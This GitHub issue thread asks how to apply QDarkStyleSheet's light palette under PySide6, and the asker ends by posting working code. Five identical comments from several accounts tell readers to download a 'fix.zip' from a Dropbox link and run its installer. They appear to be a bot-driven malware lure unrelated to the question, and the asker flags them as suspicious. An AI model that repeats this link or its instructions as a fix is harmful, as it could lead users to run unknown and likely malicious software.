### ISSUE TITLE
How to use the Light theme?

### ISSUE THREAD

**Issue by joaonc** [ColinDuquesnoy/QDarkStyleSheet#358]
#### Environment
Python 3.10 with pyside6  6.7.2

#### Question
Following up from issue https://github.com/ColinDuquesnoy/QDarkStyleSheet/issues/240, looks like a light theme has been implemented, but I don't see how to use it (not in documentation).

The issue is that my OS is set to Dark theme and Qt shows the palette from the OS and we can't choose in Qt whether we want light or dark.   In this app I want the UI to be light, regardless of the OS theme.

How can I set the app to use the light theme when doing
```python
app.setStyleSheet(qdarkstyle.load_stylesheet(qt_api='pyside6'))
```

thank you!!

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by joaonc** [comment]
Following the example in the code, tried this, but didn't work:
```python
import qdarkstyle
from qdarkstyle.light.palette import LightPalette

...
app.setStyleSheet(
    qdarkstyle.load_stylesheet(qt_api='pyside6', palette=LightPalette)
)
```

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by joaonc** [comment]
(Edit: the previous bot answers have been deleted.)

3 answers in a row with the exact same set of instructions, which is to download a zip file and then execute it?
Sounds a bit suspicious..   not going to open that file, that's for sure.

Is there an example in code or a PR open that I can look at?

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by joaonc** [comment]
Ah, ok, was able to do it.  apparently either use `qt_api` or `palette`, but not both.

This worked.
```python
    import qdarkstyle
    from qdarkstyle.light.palette import LightPalette

    app = QApplication()
    stylesheet = qdarkstyle.load_stylesheet(palette=LightPalette)
    app.setStyleSheet(stylesheet)
```
